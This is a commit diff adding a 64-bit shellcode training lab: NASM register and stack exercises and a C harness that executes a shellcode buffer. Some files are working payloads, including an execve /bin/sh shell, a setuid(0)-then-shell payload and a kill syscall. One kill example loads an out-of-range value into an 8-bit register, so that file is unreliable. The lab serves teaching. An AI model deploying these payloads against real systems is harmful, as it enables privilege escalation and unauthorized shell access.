New commit. Added also NetworkShells.

x86_64/Example_Code/8bit.asm

@@ -0,0 +1,18 @@
+; 8 bit registers 'undocumented', test
+; dash@hack4.org
+; May 2016 
+;
+; wikipedia, shellcode trainings no access to certain cpu registers in 8 bit mode
+; however, they are addressable
+; just adding right now a l to 16bit registers
+;
+
+BITS 64
+
+global _start
+_start:
+
+mov spl, 1
+mov bpl, 2
+mov sil, 3
+mov dil, 4

x86_64/Example_Code/byte_placement_r10.asm

@@ -0,0 +1,22 @@
+; shellcode-lab64bit
+; dash@hack4.org
+; byte placements on 64 bit - example for new register r10
+BITS 64
+global _start
+
+_start:
+
+; former general purpose register
+sub r10, r10
+
+mov	r10, 0x4142434445464748
+sub r10, r10
+
+mov r10d, 0x41424344
+sub r10d, r10d
+
+mov r10w, 0x4142
+sub r10w, r10w
+
+mov r10b,0x42
+sub r10b, r10b

x86_64/Example_Code/byte_placement_rax.asm

@@ -0,0 +1,28 @@
+; shellcode-lab64bit
+; dash@hack4.org
+; byte placements on 64 bit - example
+BITS 64
+global _start
+
+_start:
+
+; former general purpose register, example
+; sub is used to clear out the register
+sub rax, rax
+
+mov	rax, 0x4142434445464748
+sub rax, rax
+
+mov eax, 0x41424344
+sub eax, eax
+
+; address 16bit
+mov ax, 0x4142
+
+; overwrite the higher byte of ax
+; 0x4142 gets to 0x2d42
+mov ah,0x2d
+sub ah, ah
+
+mov al,0x41
+sub al, al

x86_64/Example_Code/clear_register.asm

@@ -0,0 +1,22 @@
+; shellcode-lab64 
+; dash@hack4.org
+;
+
+; some example to zero-out a register
+BITS 64
+global _start
+_start:
+
+xor rax, rax	; initial clearing - classic xor
+mov rax, 0xDEADBEEF
+sub rax, rax    ; sub opcode
+
+mov rax, 0xF00DBABE
+xor rax, rax	; classic xor
+
+; check value of register and add or sub from that
+; let's assume 29A is in the register rcx
+sub rcx, rcx
+mov rcx, 0x29A
+sub rcx, 666 
+; zero'd

x86_64/Example_Code/execve.asm

@@ -0,0 +1,21 @@
+BITS 64
+global _start
+
+_start:
+
+xor rax, rax
+
+push	rax 					; null terminator for the string
+mov 	rbx, 0x68732f6e69622f2f ; //bin/sh backwards
+push 	rbx 					;
+mov 	rdi, rsp				; move address from stack pointer to first argument
+
+push	rax
+push	rdi						; actually we would not need this one
+mov		rsi, rsp				; move the address to the 2nd argument
+
+mov		rdx, rax				; no envp necessary
+
+mov		al,0x3B					; execve into rax
+
+syscall

x86_64/Example_Code/execve_setuid.asm

@@ -0,0 +1,29 @@
+BITS 64
+global _start
+
+_start:
+
+xor rax, rax
+push rax						; push the cleared register
+pop rdi							; pop the zer0z into 1st argument
+
+add	   al,0x69					; setuid 105 or 0x69h
+syscall							; call setuid(0)
+
+
+xor rax, rax
+
+push	rax 					; null terminator for the string
+mov 	rbx, 0x68732f6e69622f2f ; //bin/sh backwards
+push 	rbx 					;
+mov 	rdi, rsp				; move address from stack pointer to first argument
+
+push	rax
+push	rdi						; actually we would not need this one
+mov		rsi, rsp				; move the address to the 2nd argument
+
+mov		rdx, rax				; no envp necessary
+
+mov		al,0x3B					; execve into rax
+
+syscall

x86_64/Example_Code/exit.asm

@@ -0,0 +1,14 @@
+; shellcode lab 64Bit
+; exit example as it should be ;)
+; dsah@hack4.org
+; 
+BITS 64
+global _start
+
+_start:
+
+xor		rax,rax
+xor		rdx,rdx
+mov		al,0x3C
+mov		dil,4
+syscall

x86_64/Example_Code/exit_nulls.asm

@@ -0,0 +1,16 @@
+; shellcode-lab 64Bit
+; dash@hack4.org
+; exit code with null bytes
+;
+
+BITS 64
+
+global _start
+
+_start:
+
+xor		rax,rax
+xor		rdx,rdx
+mov		rax,0x3C
+mov		rdx,4
+syscall

x86_64/Example_Code/kill.asm

@@ -0,0 +1,27 @@
+; shellcode-lab 64Bit
+; dash@hack4.org
+; kill + exit
+; 
+
+
+BITS 64
+global _start
+
+_start:
+
+xor rax, rax
+xor rdi, rdi
+xor rsi, rsi
+
+
+mov dil, 1368
+mov sil,9
+mov al, 62
+syscall
+
+xor rax, rax
+xor rdi, rdi
+
+add dil, 4
+mov al, 60
+syscall

x86_64/Example_Code/kill_noexit.asm

@@ -0,0 +1,18 @@
+; shellcode-lab64bit
+; dash@hack4.org
+; don't execute that as root, as long as adjusted
+;
+
+BITS 64
+global _start
+
+_start:
+
+xor rax, rax
+xor rdi, rdi
+xor rsi, rsi
+
+mov dil, 1 ; you might not want to run that as root
+mov sil,9
+mov al, 62
+syscall

x86_64/Example_Code/push.asm

@@ -0,0 +1,16 @@
+; shellcode-lab64 
+; dash@hack4.org
+; push example and 8byte fun on 64bit architecture
+;
+
+BITS 64
+
+global _start
+_start:
+
+push byte 0x41
+push word 0x4142
+push dword 0x41424344
+; let's comment that out
+; comment it in to see the compile error
+;push 0x4142434445464748

x86_64/Example_Code/push_mov.asm

@@ -0,0 +1,14 @@
+; shellcode-lab64 
+; dash@hack4.org
+; push example and 8byte fun on 64bit architecture
+; use mov to bring up your 8byte value on the stack
+; 
+
+BITS 64
+
+global _start
+_start:
+
+xor rax, rax ; clear register
+mov rax, 0x4142434445464748 ; place 8byte in register rax
+push rax                    ; push it onto the stack

x86_64/Example_Code/skeleton.c

@@ -0,0 +1,17 @@
+/* shellcode-lab 64Bit 
+   dash@hack4.org
+   
+   use -z execstack
+   or set char code to const
+*/
+
+#include <stdio.h>
+#include <string.h>
+
+unsigned char code[] ="shellcode wants to be placed here!";
+main()
+{
+   printf("Shellcode Len: %d\n", (int)strlen(code));
+   int (*ret)() = (int(*)())code;
+   ret();
+}

x86_64/Example_Code/xchg.asm

@@ -0,0 +1,20 @@
+; xchg example code
+; dash@hack4.org
+; shellcode lab
+; may 2016
+
+BITS 64
+global _start
+
+_start:
+
+xor rax, rax
+xor rbx, rbx
+
+mov rax, 0x29A ; http://web.textfiles.com/ezines/29A/
+mov rbx, 0x539
+mov r10, 0xBEEFBEEFBEEFBEEF
+xchg rax, r10
+xchg r10, r9
+xchg rbx, rax
+xchg rdi,rsp